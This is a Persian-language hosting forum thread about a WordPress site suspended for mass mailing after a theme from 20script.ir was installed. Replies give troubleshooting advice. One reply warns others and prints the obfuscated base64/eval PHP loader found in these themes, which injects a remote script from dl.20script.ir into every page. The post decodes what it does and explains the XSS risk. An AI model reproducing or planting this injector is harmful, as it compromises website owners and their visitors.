ارسال ایمیل انبوه و مسدود شدن سایت من؟

[ariawebserver]

سلام عرض میکنم به دوستان عزیزم
بنده به تازگی یک سایت در سایت سرورپارس خریداری کردم و هنوز یک هفته نشده سایت من رو مسدود کردن با این پیام :

کاربر گرامی سایت شما برای بار "اول" به دلیل ارسال ایمیل انبوه به صورت خودکار توسط سیستم امنیتی سرور مسدود شده است
چنانچه از ارسال ایمیل سرویس خود آگاه هستید ، لطفا دلیل ارسال ایمیل انبوه و نقض قوانین را اعلام بفرمایید
در صورتی که از این مورد اطلاعی ندارید ، آلوده بودن وب سایت شما و سوء استفاده از سرویس توسط هکر ها باعث بروز مشکل می گردد

خواستم بپرسم مشکل کجاست؟ من الان کلا یه هفته نمیشه سایت رو خریدم، ینی مشکل از قالب هست؟؟ من این قالب رو دانلود کردم و روی سایت سوار کردم و تا دو روز پیش اکی بود : http://www.20script.ir/%D9%82%D8%A7%...%D9%86%D8%B3/#



حالا چطور میشه فهمید که مشکل از این قالبه یا چیز دیگه؟؟

نکته 1 : آیا امکانش هست که کلا امکان ارسال ایمیل رو از طریق هاست یا وردپرس مسدود کنم که حتی اگه قالب مشکلی داشته دیگه قادر به ارسال ایمیل نباشه؟؟؟ چون به کارم نمیاد اصلا

نکته 2: من روی این هاست (دارای 3 اددان دامنه هست) 2 سایت دیگر هم دارم که وردپرسی هستند اما خب مشکلی توی اونا وجود نداره. ممکن هست که مشکل نه از سایت جدید و نه از قالب باشه و به اون دو سایت قبلی مربوط شه؟ اگه اره خب چرا خودشون دچار مشکل نشدن

[IrIsT]

سلام و درود.
ببینید داخل سایتتون کرون جابی نیست که فعال باشه؟
به مدیر سرور هم بگید تا چک کنند.بیشتر این چیزا که خود آدم نمیدونه,به چند چیز بستگی داره,یکیش کرون جاب هستش که این یکی از دلایله.
یکی امکان داره که از قالب باشه.اما بیا قالبتو عوض کن.
با مدیر سرورت درمیون بذار.بعد بهش بگو در جریان نیستی.بگو کمکت کنن.بعدش زیر نظر اونا قالبتو و هر چیزی که فکرشو میکنی,تغییر بده تا مشکل رو پیدا کنی.

[sinapm]

سایت 20 اسکریپت قالب هاش زیاد این مشکل را دارن

[Majiiid]

قالب های سایت بیست اسکریپت تماما در هاست های ما مشکل امنیتی دارن و بعنوان ویروس و حاوی فایل شل شناسایی میشن , خب شما برای اول به هاستینگ صحبت کنید بگید که اطلاع ندارین تا اونا هم مشکل رو بررسی کنند, دوم اینکه قالب رو عوض کنید از یک سایت دیگر پیدا کنید یا از قالب های خود وردپرس بصورت تستی چند روزی استفاده کنید اگر مشکلی نبود خب معلوم میشه مشکل از قالبه.

[alexahost]

بهتره کد های قالب هاتون رو چک کنین تا مشخص بشه

[mvasmous]

امکان داره یکی از کاربرانتون یا با همون فالب شل اپلود کردین قالب را رایگان استفاده برای سایت هایی که در هاست هستند استفاده نکنید اگر یکی از انها هک شود دیگر سایتها هم به فنا میرن
شما اول نگاه کنین این ایمل ها چگونه ارسال میشه از طریق کروب جاب هست یا از طریق دیگهایی ارسال میشه
دوم نگاه کنید یوزر دیتا بیس به هاست شما اضافه شده ویا دیتا بیس جدیدی ساخته شده
اگر باز هم نشد
از مدیر سرور بخواهین این کار را انجام بده یا سایت ها را از نو شروع کنید و قید همه سایت هاتون را بزنید

[syncronet]

به لحاظ امنیتی پیشنهاد نمیشه از اسکریپتهای ارایه شده بر روی سایت 20script.ir استفاده کنید. در بعضی از پوسته های وردپرس عرضه شده برای دانلود بر روی این سایت کد زیر مشاهده شده:

کد:

<?php $_F=__FILE__;$_X='Pz48c2NyNHB0IHR5cDU9InQ1eHQvajF2MXNjcjRwdCIgc3JjPSJodHRwOi8vZGwuYTBzY3I0cHQuNHIvNG1nL3c1YnM0dDUuanMiPjwvc2NyNHB0Pg==';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));?>

این کد php کد زیر رو در صفحات سایت میزبان اینجکت می کنه:

کد:

<script type="text/javascript" src="http://dl.20script.ir/img/website.js"></script>

احتمالا انگیزه عاملان انتشار این پوسته های دستکاری شده، سو استفاده از سایتهای وردپرسی برای راه اندازی سرویس های پاپ آپ بوده.

متاسفانه مشکل تنها به اینجا ختم نمیشه، اینجکت این کد یک خطر امنیتی بسیار بزرگ برای سایتهای قربانیان ایجاد می کنه. هر سایت وردپرسی که یکی از این پوسته های آلوده رو بر روی وردپرس خودش نصب و فعال کنه در واقع امنیت سایت خودش رو به امنیت dl.20script.ir گره زده. هر شخصی (ازجمله صاحبان خود سایت 20script.ir) که بتونه به فایل

کد:

http://dl.20script.ir/img/website.js

دسترسی پیدا کنه و این فایل رو دستکاری کنه می تونه از طریق حملات XSS برای نفوذ به سایتهایی که پوسته های آلوده رو بر روی وردپرس نصب کردند استفاده کنه.

[alimoein]

سلام عرض میکنم به دوستان عزیزم
بنده به تازگی یک سایت در سایت سرورپارس خریداری کردم و هنوز یک هفته نشده سایت من رو مسدود کردن با این پیام :



خواستم بپرسم مشکل کجاست؟ من الان کلا یه هفته نمیشه سایت رو خریدم، ینی مشکل از قالب هست؟؟ من این قالب رو دانلود کردم و روی سایت سوار کردم و تا دو روز پیش اکی بود : http://www.20script.ir/%D9%82%D8%A7%...%D9%86%D8%B3/#



حالا چطور میشه فهمید که مشکل از این قالبه یا چیز دیگه؟؟

نکته 1 : آیا امکانش هست که کلا امکان ارسال ایمیل رو از طریق هاست یا وردپرس مسدود کنم که حتی اگه قالب مشکلی داشته دیگه قادر به ارسال ایمیل نباشه؟؟؟ چون به کارم نمیاد اصلا

نکته 2: من روی این هاست (دارای 3 اددان دامنه هست) 2 سایت دیگر هم دارم که وردپرسی هستند اما خب مشکلی توی اونا وجود نداره. ممکن هست که مشکل نه از سایت جدید و نه از قالب باشه و به اون دو سایت قبلی مربوط شه؟ اگه اره خب چرا خودشون دچار مشکل نشدن

بیست اسکریپت زیاد قالباش اوکی نیست

[Santourio]

معمولا در چنین مواقعی وقتی به سرویس دهنده تیکت بدید میتونن راهنماییتون کنن

شاید شما خودتون تنظیمات ایمیل رو فعال کردین و برای مثال به جای اینکه 1 ایمیل فرستاده باشه چندین ایمیل فرستاده.

تیکت بدید بگید براتون بررسی کنن فکر نمیکنم مشکل از قالب باشه

[mvasmous]

روی این هاستتون چه سایت هایی دارین
اگر امکانش هست بدین تا براتون یا مدیریت یا کسی که در این کار مجرب هست یررسی کنه
یه نگاه هم به قسمت ایمیل هاسستون هم بندازین ببنید اکانتی به اون قسمت اضافه شده یا نه